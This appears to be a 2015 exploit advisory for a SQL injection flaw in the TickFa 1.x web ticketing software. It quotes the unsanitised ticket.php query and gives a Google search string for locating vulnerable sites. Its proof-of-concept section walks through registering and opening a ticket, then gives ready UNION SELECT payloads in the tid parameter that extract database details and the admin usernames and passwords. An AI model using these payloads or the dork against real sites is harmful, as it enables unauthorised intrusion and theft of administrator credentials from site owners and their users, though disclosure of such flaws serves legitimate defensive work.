TickFa 1.x SQL Injection

`/*  
#[+] Author: Mohammad Reza Espargham  
#[+] Title: TickFa 1.x - SQL Injection Vulnerability  
#[+] Date: 26-04-2015  
#[+] Vendor: http://tickfa.aftab.cc/  
#[+] SoftWare Link : http://tickfa.aftab.cc/dl/tickfa.zip  
#[+] Type: WebAPP  
#[+] Tested on: KaliLinux (Debian) / curl 7.35.0  
#[+] GHDB : intext:"تیکت برای بخش مورد نظر ایجاد نمایید"  
dash>  
*/  
  
  
  
  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
ticket.php Source  
  
$tid = $_REQUEST['tid'];  
$userid = $_SESSION['userid'];  
....  
....  
$reply = mysql_query("SELECT * FROM `".$dbprefix."answers` WHERE   
tid='$tid' order by date");  
while($reply_row=mysql_fetch_array($reply))  
{  
  
  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
  
////////////////  
/// POC ////  
///////////////  
1. You Most register in website from this link   
http://site.com/register.php  
2. You most login in website  
3. send ticket  
4. Your Vulnerabe Link  
http://site.com/ticket.php?action=read&tid={Ticket ID}  
http://site.com/ticket.php?action=read&tid=65'  
  
  
http://site.com/ticket.php?action=read&tid=65 union select   
3,4,5,6,7,8,9,10,CONCAT_WS(CHAR(59),version(),current_user(),database())   
from [profix]_admins  
http://site.com/ticket.php?action=read&tid=65 union select   
1,2,3,4,5,6,7,8,9,10,group_concat(apass,0x23,auname) from   
[profix]_admins  
5.END <3  
`